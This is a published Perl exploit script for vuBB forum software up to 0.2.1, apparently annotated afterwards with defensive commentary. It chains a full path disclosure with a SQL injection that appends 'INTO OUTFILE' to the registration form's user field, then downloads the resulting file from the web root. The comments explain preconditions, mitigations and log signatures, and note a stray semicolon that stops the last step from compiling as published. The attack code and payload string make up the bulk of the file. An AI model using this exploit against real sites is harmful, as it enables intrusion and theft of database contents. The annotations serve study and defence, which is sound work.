#!/usr/bin/perl

#

# by DarkFig -- acid-root.new.fr

# French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full
# Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt

#

use IO::Socket;

use LWP::Simple;



# Header
#
# Prints the tool banner. The comments throughout this file were added for
# readers studying the attack chain (how it works, what stops it, what to
# look for in logs); the code itself is left exactly as published.

print "\r\n+---------------------------------------+", "\r\n";

print "|  vuBB <= 0.2.1 [BFA] SQL Injection   -|", "\r\n";

print "+---------------------------------------+", "\r\n";



# Usage
#
# Expects three positional arguments: host, path and username. Only the third
# is checked, and only for truthiness, so a username of "0" or "" is treated
# as missing and triggers the usage text. Nothing else about the arguments is
# validated; they flow straight into the HTTP requests below.

if(!$ARGV[2]){

  print "| Usage: <host> <path> <username> ------|", "\r\n";

  print "+---------------------------------------+", "\r\n";

exit;

}



# Host
#
# Strips a leading "http://" from the first argument. The greedy (.*) keeps
# everything after the scheme, so any path given in $ARGV[0] ends up in $host
# too (the path is meant to arrive separately in $ARGV[1]). $host is a package
# global: the file has no `use strict` and does not declare it with `my`.

if($ARGV[0] =~ /http:\/\/(.*)/){

  $host = $1;

} else {

  $host = $ARGV[0];

}

print "[+]Host: $host\r\n";



# Var
#
# Request parameters, assembled from the command line as-is (no encoding).
# $fpd  - URL of an application include file, requested directly to provoke a
#         verbose PHP error (see "Full Path Disclosure"). No "/" is inserted
#         between $path and "includes/…", so $path is expected to end with a
#         slash; the results URL further down inserts its own "/", which is
#         inconsistent with this. The trailing `;;` is an empty statement.
# $err1..$err3 - fixed error strings printed by the failure branches.
# $poti - the request line of a hand-built HTTP POST to the registration
#         form; the rest of that request is written over a raw socket below.

my $path = $ARGV[1];

my $user = $ARGV[2]; print "[+]User: $user\r\n";

my $port = 80;

my $fpd  = "http://".$host.$path."includes/vubb.php";;

my $err1 = "[-]Can't connect to the host\r\n";

my $err2 = "[-]Can't retrieve the full path\r\n";

my $err3 = "[-]Can't retrieve the results\r\n";

my $poti = "POST "."$path"."index.php?act=register&action=register"." HTTP/1.1";



# Full Path Disclosure
#
# Step 1 of the chain: fetch an include file out of its normal context and
# read the server's absolute filesystem path out of the PHP error text (the
# regex keys on the "in <b>…</b>" markup PHP emits when errors are rendered to
# the client). The path is needed to build the OUTFILE target in step 2.
# Defensively, the chain breaks right here if PHP errors are not displayed to
# the client (display_errors off, errors logged server-side only) — a
# low-cost hardening that also removes a generic reconnaissance signal.
#
# Precedence note: `die print $err1 and end()` parses as
# `(die print $err1) and end()`; on a failed fetch the script prints $err1 and
# then dies with print's return value ("1"), so end() is never reached.
# `print $err2 and end()` below parses as `(print $err2) and end()`, which is
# the intended print-then-exit.

$req0 = get($fpd) or die print $err1 and end();

if($req0 =~ /in <b>(.*)\/includes\/vubb.php<\/b>/) {

  $fullpath = $1."/thisismypasswd.txt";

  print "[+]Path: $1\r\n";

} else {

  print $err2 and end();

}



# Malicious data
#
# Step 2: the SQL injection. The `user` field is closed with a URL-encoded
# quote (%27), extended with `INTO OUTFILE '<fullpath>'`, and the rest of the
# original statement is commented out (%23 = '#'). The intent is that the
# query which consumes the submitted username (presumably a lookup during
# registration) writes its result set to a file under the web root, which
# step 3 then fetches over HTTP. The remaining form fields are fixed filler.
#
# Preconditions for this to succeed, each of which is also a mitigation:
#  - the application interpolates user input into SQL (fix: parameterised
#    queries / prepared statements);
#  - the database account has MySQL's FILE privilege (fix: least-privilege
#    account without FILE);
#  - secure_file_priv does not restrict OUTFILE away from the web root, and
#    the target directory is writable by the database server process.
# Detection: the literal "INTO OUTFILE" inside a POST body, and the constant
# filler values here (the hotmail address, "mypassword", "iacceptohackit")
# are reliable signatures of this particular tool in access/WAF logs.
#
# The request is written by hand over a raw TCP socket (port 80, plain HTTP)
# rather than through LWP. The Content-Length line ends with "\r\n\n", not
# the "\r\n\r\n" header terminator HTTP specifies; tolerant servers accept
# it. `or print $err1 and end()` parses as `(print $err1) and end()`.

my $pdat = 
"user=$user"."%27+INTO+OUTFILE+%27"."$fullpath"."%27%23"."&email=a669c4570f%40hotmail.com&vemail=a669c4570f%40hotmail.com&pass=mypassword&vpass=mypassword&agreement=iacceptohackit&agree=on";

my $ldat = length $pdat;

my $req1 = IO::Socket::INET->new(

                                 PeerAddr => $host,

                                 PeerPort => $port,

                                 Proto => "tcp"

                                    ) or print $err1 and end();

print $req1 "$poti", "\r\n";

print $req1 "Host: $host", "\r\n";

print $req1 "Content-Type: application/x-www-form-urlencoded", "\r\n";

print $req1 "Content-Length: $ldat", "\r\n\n";

print $req1 "$pdat", "\r\n";

close($req1);



# Results
#
# Step 3: retrieve the file the OUTFILE clause was meant to create and save
# the response body locally. As preserved here the first statement contains a
# stray `;` inside the get(...) argument list and will not compile; it is left
# as published. The local write uses a bareword filehandle and a 2-arg open
# with no error check. From the server side, a GET for an unexpected .txt
# file in the web root immediately after a registration POST is the
# observable trace of this step.

$req2 = get("http://".$host.$path."/thisismypasswd.txt";) or print $err3 and 
end();

open(f, ">VUBB_RESULT.txt");

print f $req2;

close(f);

print "[+]Done: VUBB_RESULT.txt\r\n";

end();



# Bye
#
# Prints the closing banner line and terminates the process. Used for both the
# normal completion and the error branches above. The earlier calls precede
# this definition, which is fine in Perl as long as they use parentheses.

sub end {

print "+---------------------------------------+", "\r\n";

exit;

}
